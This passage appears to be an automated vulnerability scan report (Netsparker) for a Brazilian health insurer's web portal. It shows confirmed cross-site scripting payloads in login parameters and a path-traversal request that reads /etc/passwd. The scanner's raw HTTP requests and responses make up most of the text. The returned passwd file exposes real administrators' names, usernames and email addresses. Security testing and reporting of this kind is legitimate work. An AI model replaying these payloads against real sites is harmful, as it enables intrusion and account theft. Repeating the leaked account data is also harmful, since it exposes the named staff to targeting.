<form id="frmrestrita" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top" method="post">
<fieldset>
<legend><span>Área restrita:</span></legend>
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="54593" />
<input type="hidden" name="kitsite" value="null" />
<div class="inputWrapper">
<input type="text" name="ds_login" id="usuario" onfocus="javascript:limparNoFocus('Usuário', 'text', this);" onblur="javascript:escreverNoBlur('Usuário', 'text', this);" value="Usuário" />
</div>
<div class="inputWrapper">
<input type="text" id="mockpass" class="mock" value="Senha" onFocus="document.getElementById('mockpass').style.display='none'; document.getElementById('realpass').style.display='inline'; document.getElementById('realpass').focus();"><input type="password" name="ds_senha" id="realpass" class="real" style="display: none;" onBlur="if(this.value=='') {document.getElementById('mockpass').style.display='inline'; document.getElementById('realpass').style.display='none';}">
</div>
<button type="button" onclick="javascript: validar();">ok</button>
<ul class="opcoes_acesso">
<li><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49144" title="Receber sua senha por e-mail" target="_top">Esqueci a senha</a></li>
<li><a href="/pct/index.jsp?cd_canal=54593&amp;cd_secao=49101" target="_top" title="Cadastro de colaborador">Cadastre-se</a></li>
</ul>
</fieldset>
</form>


<form id="frmbusca" action="./index.jsp?cd_canal=54593&cd_secao=49103" method="post">
<fieldset>
<input type="hidden" name="cd_canal" value="54593" />
<label for="busca" class="lbbusca">Busca no site:</label>
<div class="inputWrapper">
<input type="text" onfocus="javascript:limparNoFocus('Digite a palavra', 'text', this);" onblur="javascript:escreverNoBlur('Digite a palavra', 'text', this);" name="query" id="query" value="Digite a palavra" />
</div>
<button type="submit">ok</button>
</fieldset>
</form>

<ul id="navegacao">



<li class="primeiro "><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54576" title="Visitar a seção Unimed">Unimed <span>Unimed</span></a></li>








<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54785" title="Visitar a seção Atendimento">Atendimento <span>Atendimento</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54586" title="Visitar a seção Serviços">Serviços <span>Serviços</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=63843" title="Visitar a seção HGU">HGU <span>HGU</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=49111" title="Visitar a seção Agência Unimed de Notícias">Agência Unimed de Notícias <span>Agência Unimed de Notícias</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54584" title="Visitar a seção Guia Médico">Guia Médico <span>Guia Médico</span></a></li>







<li ><a href="./index.jsp?cd_canal=54593&amp;cd_secao=54587" title="Visitar a seção Ouvidoria">Ouvidoria <span>Ouvidoria</span></a></li>




</ul>
</div>
<!-- fecha topo -->

<script type="text/javascript">
$(document).ready(function(){
var secaoAberto = '-1';
var subContents = $('#navegacao li');
for( var i = 0; i < subContents.length; i++ ) {
if( subContents[i].firstChild.href.indexOf(secaoAberto) != -1 ) {
var clazz = subContents[i].className;
clazz += " ativo";
subContents[i].className = clazz;
}
}
});
</script>



<!-- fim topo -->

<!-- ini corpo -->





<link href="/pct/corpo/2009-listagem-kit-site/css/corpo.css?1" rel="stylesheet" type="text/css" media="screen" />
<script src="/pct/comum/js/jquery-latest.js" type="text/javascript" charset="ISO-8859-1"></script>
<script src="/pct/corpo/2009-listagem-kit-site/js/ArquivoUtils.js?2" type="text/javascript"></script>

<script type="text/javascript">
// Listener para executar eventos ao carregar da página
var arq = new ArquivoUtils();
if ( window.addEventListener ) {
window.addEventListener( "load" , function() {
bodyObj.init();
} , false );
}
else if ( window.attachEvent ) {
window.attachEvent( "onload" , function() {
bodyObj.init();
} );
}

var bodyObj = {
init: function() {
arq.setUrl("/pct");
arq.setSecao("54585");
arq.setNmSecao("Notícias");
arq.setAprovadas("></script><script>netsparker(9)</script>");
arq.consultarMaterias( 1 );

}
}
</script>
<!-- abre conteúdo -->
<div id="conteudo" class="contemfloat corpoListagemKitSite">
<div id="coluna1">

<p id="breadcrumb"><a href="./index.jsp?cd_canal=54593">Página Inicial</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=0">Portal Unimed</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=50056">Portal Layout 2009</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=50057">Kit-sites</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=50058">Federações</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=50915">Paraná</a> &gt; <a href="./index.jsp?cd_canal=54593&amp;cd_secao=54575">Singular Ponta Grossa</a> &gt; Notícias</p>
<!-- abre menu interno -->







<link href="/pct/tema/2009-kit-site/estilo_sem_menu.css" rel="stylesheet"type="text/css" media="screen" />
<!-- fecha menu interno -->
<!-- abre texto -->
<div id="comentLoad" style="display: none;">
<ul id="loading">
<li><img src="/pct/corpo/2009-listagem-kit-site/img/ajax-loader.gif" width="32" height="32"/></li>
<li>Aguarde, carregando..</li>
</ul>
</div>
<div id="topico" style="display: none;">
<div id="icone_rss">

</div>
<h1>Notícias</h1>
</div>
<div id="texto">
</div>
<!-- fecha texto -->
</div>
<!-- abre coluna 2 -->
<div id="coluna2">
<!-- ini guia -->









<link rel="stylesheet" type="text/css" href="/pct/comum/js/extjs/resources/css/ext-all-notheme.css" />
<link rel="stylesheet" type="text/css" href="/pct/comum/js/extjs/resources/css/xtheme-gray-extend.css" />
<script type="text/javascript" language="javascript" src="/pct/comum/js/jquery-simplemodal-min.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/jquery-create.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/jquery-maskedinput-min.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/atooltip.min.jquery.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/extjs/adapter/ext/ext-base.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/extjs/ext-all.js"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/widgets/guia-medico/guia-medico-id.js?2"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/guiamedico/guia-medico-util.js?2"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/guiamedico/guia-medico-combo.js?2"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/guiamedico/guia-medico-combo-ajax.js?3"></script>
<script type="text/javascript" language="javascript" src="/pct/comum/js/guiamedico/guiamedico.js?2"></script>

<script type="text/javascript" language="javascript">

var csContexto = "/pct";
var csTipo = "9";
var codUnimedKit = "69";
var codCarteirinha = "";
var canDownGM = "true";
var pRecurso = "";
..
- /pctr/layout/layout_2005/form_login.jsp

/pctr/layout/layout_2005/form_login.jsp CONFIRMED

https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
cd_canal GET '"--></style></script><script>alert(0x00363C)</script>

Request

GET /pctr/layout/layout_2005/form_login.jsp?cd_canal='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00363C)%3C/script%3E HTTP/1.1
Referer: https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro=sim
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=FEDD8DF0E6BF2D67C0C0025385A0CCF1.dcpr5033; JSESSIONID=F3315844F997DC69298AE150FCA3EA4E.dcpr5033; JSESSIONID=0F7FA6809E864C4410A04300A2A53869.dcpr5034; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:09:22 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 3355
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<link href="/pctr/layout/layout_2005/css/topo.css" rel="stylesheet" type="text/css">
</head>
<body style="background-color:transparent;" onload="javascript:setaFoco();">
<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script language="JavaScript" type="text/javascript">
<!--
function validar() {
if (validarPreenchimento(document.login.ds_login, "Por favor, digite seu login.")) {
if (validarPreenchimento(document.login.ds_senha, "Por favor, digite sua senha.")) {
document.login.submit();
}
}
}

function seguro() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") == -1) {
var endereco = "https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal='"--></style></script><script>netsparker(0x00363C)</script>";
var cd_secao = "null";
if (cd_secao != "null") {
endereco = endereco + "&cd_secao=null";
}
endereco = endereco + "&seguro=sim";
document.location = endereco;
window.focus();

}
}

function setaFoco() {
var urlAtual = location.href;
//alert("entrou111");
if (urlAtual.indexOf("&seguro=sim") > -1) {
document.login.ds_login.focus();
}
}

function verCertificado() {
var URL = "https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
var W = "500";
var H = "510";
var S = "no";

var Wpopupsize =(W/2);
var Hpopupsize =(H/2);
var CenterPopUpX = (screen.width/2)-(Wpopupsize);
var CenterPopUpY = (screen.height/2)-(Hpopupsize);
var pos = "left="+CenterPopUpX+",top="+CenterPopUpY;
var desktop = window.open(URL, "preview", "width="+W+",height="+H+",toolbar=no,location=no,status=no,menubar=no,scrollbar s="+S+",resizable=no,"+pos);

// parent.location.href="https://www.thawte.com/cgi/server/certdetails.exe?referer=https://www.unimed.com.br/";
}


-->
</script>
<div class="loginBox" style="position:absolute; top:0; margin:0; left:0;">
<div class="restrito">Área restrita para colaboradores e cooperados:</div>
<form method="POST" name="login" action="https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario" target="_top">
<input type="hidden" name="secao_ativa" value="null" />
<input type="hidden" name="cd_canal" value="'"--></style></script><script>netsparker(0x00363C)</script>" />
<input type="hidden" name="kitsite" value="null" />
Login:
<input type="text" class="textBox" name="ds_login">
Senha:
<input type="password" class="textBox" name="ds_senha">
<a href="javascript:validar()"><img id="botaook" src="/pctr/layout/layout_2005/imgs/button/bt-ok.png" border="0"></a>
</form>
<div class="esqueci"><span style="float: left; margin-left: 110px;"><a href="/pct/index.jsp?cd_canal='"--></style></script><script>netsparker(0x00363C)</script>&amp;cd_secao=49101" target="_top">Cadastre-se aqui</a></span> | <a href="/pct/index.jsp?cd_canal='"--></style></script><script>netsparker(0x00363C)</script>&amp;cd_secao=49144" target="_top">Esqueci minha senha</a></div>
</div>
</body>
</html>
- /pctr/servlet/NovoLoginUsuario

/pctr/servlet/NovoLoginUsuario CONFIRMED

https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario

Parameters

Parameter Type Value
secao_ativa POST null
cd_canal POST '"--></style></script><script>alert(0x003817)</script>
kitsite POST null
ds_login POST 3
ds_senha POST 3

Request

POST /pctr/servlet/NovoLoginUsuario HTTP/1.1
Referer: https://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro=sim
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.unimed.com.br
Cookie: JSESSIONID=DFCCFF91E315C04700E0EFF1E0635616.dcpr5034; JSESSIONID=9BD6B037D56664E2F3F769AA5F398D2E.dcpr5034; JSESSIONID=DFCCFF91E315C04700E0EFF1E0635616.dcpr5034; enquete_unimed_671=671
Content-Length: 146
Expect: 100-continue
Accept-Encoding: gzip, deflate

secao_ativa=null&cd_canal='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x003817)%3c%2fscript%3e&kitsite=null&ds_login=3&ds_senha=3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:09:58 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 212
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<html><body><script language="JavaScript">document.location='https://www.unimed.com.br/pctr/index.jsp?cd_canal='"--></style></script><script>netsparker(0x003817)</script>&cd_secao=49762';</script></body></html>
- /pctr/servlet/NovoLoginUsuario

/pctr/servlet/NovoLoginUsuario CONFIRMED

https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario

Parameters

Parameter Type Value
secao_ativa POST '"--></style></script><script>alert(0x0045C3)</script>
cd_canal POST 49146
kitsite POST null
ds_login POST Usuário
mockpass POST Senha
ds_senha POST 3

Request

POST /pctr/servlet/NovoLoginUsuario HTTP/1.1
Referer: http://www.unimed.com.br/pctr/index.jsp?cd_canal=49146&cd_secao=49139&cd_materia=323292
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.unimed.com.br
Cookie: JSESSIONID=394C62AE10D480E99402241D898AE4CA.dcpr5033; JSESSIONID=CF85023FD977AADB451990FC024C2250.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Content-Length: 173
Expect: 100-continue
Accept-Encoding: gzip, deflate

secao_ativa='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0045C3)%3c%2fscript%3e&cd_canal=49146&kitsite=null&ds_login=Usu%c3%a1rio&mockpass=Senha&ds_senha=3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:15:07 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 222
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<html><body><script language="JavaScript">document.location='http://www.unimed.com.br/pctr/index.jsp?cd_canal=49098&secao_ativa='"--></style></script><script>netsparker(0x0045C3)</script>&erro=-1';</script></body></html>
- /pctr/servlet/NovoLoginUsuario

/pctr/servlet/NovoLoginUsuario CONFIRMED

https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario

Parameters

Parameter Type Value
secao_ativa POST null
cd_canal POST 49146
kitsite POST '"--></style></script><script>alert(0x004639)</script>
ds_login POST Usuário
mockpass POST Senha
ds_senha POST 3

Request

POST /pctr/servlet/NovoLoginUsuario HTTP/1.1
Referer: http://www.unimed.com.br/pctr/index.jsp?cd_canal=49146&cd_secao=49139&cd_materia=323292
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.unimed.com.br
Cookie: JSESSIONID=5047C1CE295D8DBFAD9A2DADC18BAB9C.dcpr5034; JSESSIONID=CF85023FD977AADB451990FC024C2250.dcpr5033; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Content-Length: 173
Expect: 100-continue
Accept-Encoding: gzip, deflate

secao_ativa=null&cd_canal=49146&kitsite='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x004639)%3c%2fscript%3e&ds_login=Usu%c3%a1rio&mockpass=Senha&ds_senha=3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:15:35 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 232
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<html><body><script language="JavaScript">document.location='http://www.unimed.com.br/pctr/index.jsp?cd_canal=49098&secao_ativa=0&kitsite='"--></style></script><script>netsparker(0x004639)</script>&erro=-1';</script></body></html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /pctr/servlet/NovoLoginUsuario

/pctr/servlet/NovoLoginUsuario CONFIRMED

https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario

Identified Cookie

JSESSIONID

Request

GET /pctr/servlet/NovoLoginUsuario HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=67AD8B8C6A84DA8FB1B0210276158033.dcpr5034
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 15 Nov 2011 17:03:23 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=C29B67451844E6475B194FFB035B3AE5.dcpr5033; Path=/pctr; Secure,JSESSIONID=C29B67451844E6475B194FFB035B3AE5.dcpr5033; Path=/pctr,JSESSIONID=C29B67451844E6475B194FFB035B3AE5.dcpr5033; Path=/pctr
Location: http://www.unimed.com.br/pctr/index.jsp?cd_canal=49146
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


Local File Inclusion

Local File Inclusion

1 TOTAL
IMPORTANT
CONFIRMED
1
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Netsparker confirmed this issue by reading some files from the target web server.

Impact

The impact can vary, based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:

Remedy

Classification

OWASP A4 PCI v1.2-6.5.4 PCI v2.0-6.5.1 CWE-22 CAPEC-126 WASC-33
- /Comunicacao/img.do

/Comunicacao/img.do CONFIRMED

http://www.unimed.com.br/Comunicacao/img.do?cdComunicacao=../../../../../../../../../../../etc/passwd

Parameters

Parameter Type Value
cdComunicacao GET ../../../../../../../../../../../etc/passwd

Request

GET /Comunicacao/img.do?cdComunicacao=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: http://www.unimed.com.br/Comunicacao/detalhe.do?acao=inicial&cdComunicacao=333
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=954AC776992CF3BD75CB8DB63522214F.dcpr5034; JSESSIONID=19B6C6E1082BF10468FAF02C8120DAEF.dcpr5033; enquete_unimed_671=671
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:15:00 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Content-Length: 4778
Connection: close
Content-Type: image/jpeg;charset=ISO-8859-1


root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinabrt:x:499:499::/etc/abrt:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinsaslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpostgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bashricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologinBrTManag:x:206:206::/usr/local/manager/:/bin/bashtr081902:x:500:500:Renan Nascimento(Equipe BACKUP BRT):/home/tr081902:/bin/bashtr064135:x:501:500:Jeferson de Freitas Salvador(Equipe BACKUP BRT):/home/tr064135:/bin/bashtr043441:x:502:500:Joseval Rosa Gomes da Silva(Equipe BACKUP BRT):/home/tr043441:/bin/bashtr109386:x:1503:500:Michel Maciel Abrão(Equipe BACKUP BRT):/home/tr109386:/bin/bashtr059644:x:1504:500:Marcio de Oliveira Santos(Equipe BACKUP BRT):/home/tr059644:/bin/bashtr096223:x:1505:500:Leonardo de Oliveira Linhares(Equipe BACKUP BRT):/home/tr096223:/bin/bashtr059639:x:506:500:Israel da Silva Otero Seabra(Equipe BACKUP BRT):/home/tr059639:/bin/bashtr109311:x:507:500:João Victor Cano Martins(Equipe BACKUP BRT):/home/tr109311:/bin/bashtr123620:x:508:500:Francisco José de Souza(Equipe BACKUP BRT):/home/tr123620:/bin/bashtr132756:x:509:500:Alex Barcelos Soares(Equipe BACKUP BRT):/home/tr132756:/bin/bashtr129388:x:510:500:Andre dos Santos Amorim(Equipe BACKUP BRT):/home/tr129388:/bin/bashtr076116:x:511:500:Marco Antônio Alves de Oliveira(Equipe BACKUP BRT):/home/tr076116:/bin/bashtr155502:x:512:500:CRISTIANO FERREIRA DA SILVA (Equipe Backup):/home/tr155502:/bin/bashtr086980:x:513:501:Adriana Pegado Rolim Rodrigues Martins (adriana.martins@b2br.com.br):/home/tr086980:/bin/bashtr120637:x:514:501:Ulisses Oliveira de Castro (ulisses.castro@b2br.com.br):/home/tr120637:/bin/bashtr116313:x:515:501:Fabio Kuhl Lima (fabio.lima@b2br.com.br):/home/tr116313:/bin/bashtr076108:x:516:501:Sergio Fernando Mattar (sergio.mattar@b2br.com.br):/home/tr076108:/bin/bashtr088371:x:517:501:Alexandre Wagner Agostini (alexandre.agostini@b2br.com.br):/home/tr088371:/bin/bashtr076062:x:518:501:Julio César Pastro Meira (julio.meira@b2br.com.br):/home/tr076062:/bin/bashtr097180:x:519:501:Rafael Vargas (rafael.vargas@b2br.com.br):/home/tr097180:/bin/bashtr133477:x:520:501:Uriel Baesso do Prado:/home/tr133477:/bin/bashtr076104:x:521:501:Claude Florencio:/home/tr076104:/bin/bashtr107011:x:522:501:Germano Lira:/home/tr107011:/bin/bashtr160491:x:523:501:Wesley Dantas:/home/tr160491:/bin/bashadmportal:x:503:504:Usuario Aplicacao - Portal Unimed:/home/admportal:/bin/bashtomcat:x:505:506:Usuario Jboss:/home/tomcat:/bin/bashdynamix:x:504:505::/home/dynamix:/bin/bashtr165773:x:1506:501:PHILIPP FREGOLAO KREUSCHER - ADM UNIX:/home/tr165773:/bin/bashdcpu0012:x:620:504:GIOVANI VARGAS POLETTO - Cliente CYDC - Portal Unimed:/home/dcpu0012:/bin/bashbt050745:x:1507:501:ADM UNIX - Joaquim Magalhaes Neto:/home/bt050745:/bin/bashbt051010:x:1508:501:ADM UNIX - Judson Pires Junior:/home/bt051010:/bin/bashoi85307:x:1509:501:ADM UNIX - Eduardo Moreira Fraga:/home/oi85307:/bin/bashtr126097:x:1510:501:ADM UNIX - Washington da Costa Mota:/home/tr126097:/bin/bashtr108487:x:1511:500:ADM BKP - Glauber Estacio da Conceicao Queiroz:/home/tr108487:/bin/bashtr155497:x:1512:500:ADM BKP - Thayller Augusto Monturil do Nascimento:/home/tr155497:/bin/bashtr168780:x:1513:500:ADM BKP - Frederico Silva Monteiro:/home/tr168780:/bin/bashtr168779:x:1514:500:ADM BKP - Leonardo Xavier:/home/tr168779:/bin/bashtr168808:x:1515:500:ADM BKP - Filipe Fagundes Vieira:/home/tr168808:/bin/bashtr168809:x:1516:500:ADM BKP - Lucas Torres Lima:/home/tr168809:/bin/bashtr151222:x:1517:500:ADM BKP - Adriano Araujo Cavalcanti:/home/tr151222:/bin/bash
Critical Form Served Over HTTP

Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /pctr/layout/layout_2005/form_login.jsp

/pctr/layout/layout_2005/form_login.jsp CONFIRMED

http://www.unimed.com.br/pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro=sim

Form target action

https://www.unimed.com.br/pctr/servlet/NovoLoginUsuario

Request

GET /pctr/layout/layout_2005/form_login.jsp?cd_canal=54593&cd_secao=null&seguro=sim HTTP/1.1
Referer: http://www.unimed.com.br/pct/index.jsp?cd_canal=54593
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.unimed.com.br
Cookie: JSESSIONID=F6B94AFF3B7F744646891E37E67ECF39.dcpr5033; JSESSIONID=67AD8B8C6A84DA8FB1B0210276158033.dcpr5034
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 15 Nov 2011 17:03:24 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.2 (build: CVSTag=JBoss_4_0_2 date=200505022023)/Tomcat-5.5
Set-Cookie: JSESSIONID=4D9ADF8FD85951A9487B5445C56E49BB.dcpr5033; Path=/pctr
Content-Length: 3139
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Portal Nacional de Saúde :: Unimed do Brasil</title>
<link href="/pctr/layout/layout_2005/css/topo.css" rel="stylesheet" type="text/css">
</head>
<body style="background-color:transparent;" onload="javascript:setaFoco();">
<script language="JavaScript" type="text/javascript" src="/portal/comum/scripts/form.js"></script>
<script language="JavaScript" type="text/javascript">
<!--
function validar() {
